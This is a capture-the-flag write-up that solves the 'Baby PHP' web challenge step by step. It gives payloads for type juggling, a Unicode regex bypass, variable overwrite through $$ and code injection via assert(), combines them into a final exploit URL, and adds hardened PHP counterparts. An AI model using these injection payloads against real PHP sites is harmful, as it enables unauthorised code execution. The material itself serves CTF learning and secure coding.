# Baby PHP
- Category : Web
- Points : Dynamic
- Flag: `REDACTED`

## Challenge
PHP is a popular general-purpose scripting language that is especially suited to web development.

Fast, flexible and pragmatic, PHP powers everything from your blog to the most popular websites in the world.

Can you untangle this mess?!

## Test 1
```
@$msg = $_GET['msg'];
if(@file_get_contents($msg)!=="Hello Challenge!"){
    die('Wow so rude!!!!1');
}
```
You need to set the variable `msg` so that reading it with `file_get_contents` returns exactly `Hello Challenge!`. To do this, pass the base64-encoded string in a `data://` URI, which PHP reads as if it were a file. \
`msg=data://text/plain;base64,SGVsbG8gQ2hhbGxlbmdlIQ`

## Test 2
```
if(intval($k1) !== $cc || $k1 === $cc){
    die("lol no\n");
}
```
This is basic [PHP Type Juggling](http://php.net/manual/en/language.types.type-juggling.php). The `intval` of the key you enter must equal `$cc` (`1337`) without the key being literally identical to it. Appending `e0` makes the value evaluate as 1337 * 10^0, which is still 1337 but differs literally from `1337`. \
`key1=1337e0`

## Test 3
```
if(strlen($k2) == $bb){
    if(preg_match('/^\d+$/', $k2) && !is_numeric($k2)){
        if($k2 == $cc){
            @$cc = $_GET['cc'];
        }
    }
}
```
For this test, the length of the value you supply for `key2` is compared against `$bb` (42). The value is then matched against a regex and must also not be numeric. The dollar sign is a bit tricky: in a regex it normally denotes the end of the string, but here it is actually a special Unicode `$` character (the fullwidth dollar sign, sent as `%EF%BC%84` in the final URL). What the regex actually requires is digits up to that special character, and nothing after it is checked. To pass the comparison against `$cc`, which is still 1337, you can send `1337` followed by that character and pad with `a` to reach the required length. Passing these checks lets you set `cc` from the query string. \
`key2=1337$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`

## Test 4
```
if(substr($cc, $bb) === sha1($cc)){
    foreach ($_GET as $lel => $hack){
        $$lel = $hack;
    }
}
```
This test checks whether the substring of `cc` starting at offset `bb` is equal to the SHA-1 hash of `cc`. This is impossible for a string, because the hash changes every time you modify the value to try to match it. If you pass an array instead, both sides of the check come back as null and the comparison passes as true. The value of `cc` is not important, other than the fact that you initialize it as an array. After that, the [foreach](http://php.net/manual/en/control-structures.foreach.php) loop iterates over the GET parameters, including the ones added after `cc`, and creates a new global variable for each one. This is important for the next test. \
`cc[]=1234`

## Test 5
```
$‮b = "2";$a="‮b";//;1=b

if($$a !== $k1){
    die("lel no\n");
}
```
Looking at the weird string at the top, I figured it probably did something but couldn't quite figure it out so I just worked with the function in the previous test. I could overwrite variables now so I made a new k1 that was equal to 2 and then made another variable named hack that I hoped would be passed to $a and it magically was. So k1=2 and then hack=a=k1 which made the test pass.\
`k1=2` `hack=k1`

## Final Test
```
// plz die now
assert_options(ASSERT_BAIL, 1);
assert("$bb == $cc");

echo "Good Job ;)";
// TODO
// echo $flag;
```
The final test uses the `assert` function, which returns a bool. With `ASSERT_BAIL` set to 1, the program terminates when an assertion fails. Another interesting feature of [assert](http://php.net/manual/en/function.assert.php) is that it executes the code which is inside of it. So I can make a new variable $bb that runs the print flag command and then comments out the rest, making the assert true and printing the flag. \
`bb=print($flag) ;//`

Final url inject:\
https://arcade.fluxfingers.net:1819/?msg=data://text/plain;base64,SGVsbG8gQ2hhbGxlbmdlIQ&key1=1337e0&key2=1337%EF%BC%84aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&cc[]=1234&k1=2&hack=k1&bb=print($flag)%20;//
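
The variable overwrite in Test 4 and the code evaluation in the Final Test both come from treating request input as trusted names or code, and Tests 2 and 3 from loose parsing. As an added example (not part of the challenge source or this write-up's solution), here are hardened forms of those checks; the function names and the sample query are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hardened counterparts of the challenge checks (hypothetical names).

/** Return a GET parameter only if it is a plain string, so array input (cc[]=...) is rejected. */
function get_string(array $query, string $name): ?string
{
    $value = $query[$name] ?? null;
    return is_string($value) ? $value : null;
}

/** Tests 2 and 3: accept only canonical ASCII digits, then work with a real integer. */
function parse_decimal(?string $raw): ?int
{
    // \A and \z anchor the whole subject; unlike $, \z does not tolerate a trailing newline.
    if ($raw === null || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

/** Test 4: copy only allowlisted keys into an array instead of creating variables with $$name. */
function pick_params(array $query, array $allowed): array
{
    $out = [];
    foreach ($allowed as $name) {
        $out[$name] = get_string($query, $name);
    }
    return $out;
}

/** Final test: compare typed values directly; never build a code string for assert() or eval(). */
function values_match(?int $a, ?int $b): bool
{
    return $a !== null && $a === $b;
}

// Constructed sample input mirroring the parameter shapes used in this write-up.
$query = ['key1' => '1337e0', 'cc' => ['1234'], 'bb' => 'print($flag) ;//', 'k1' => '1337', 'hack' => 'k1'];
$p = pick_params($query, ['key1', 'cc', 'bb', 'k1']); // 'hack' is not allowlisted and is ignored

// Each value is validated as data; nothing from the request becomes a variable name or code.
var_dump(parse_decimal($p['key1']));
var_dump($p['cc']);
var_dump(parse_decimal($p['bb']));
var_dump(values_match(parse_decimal($p['k1']), 1337));
```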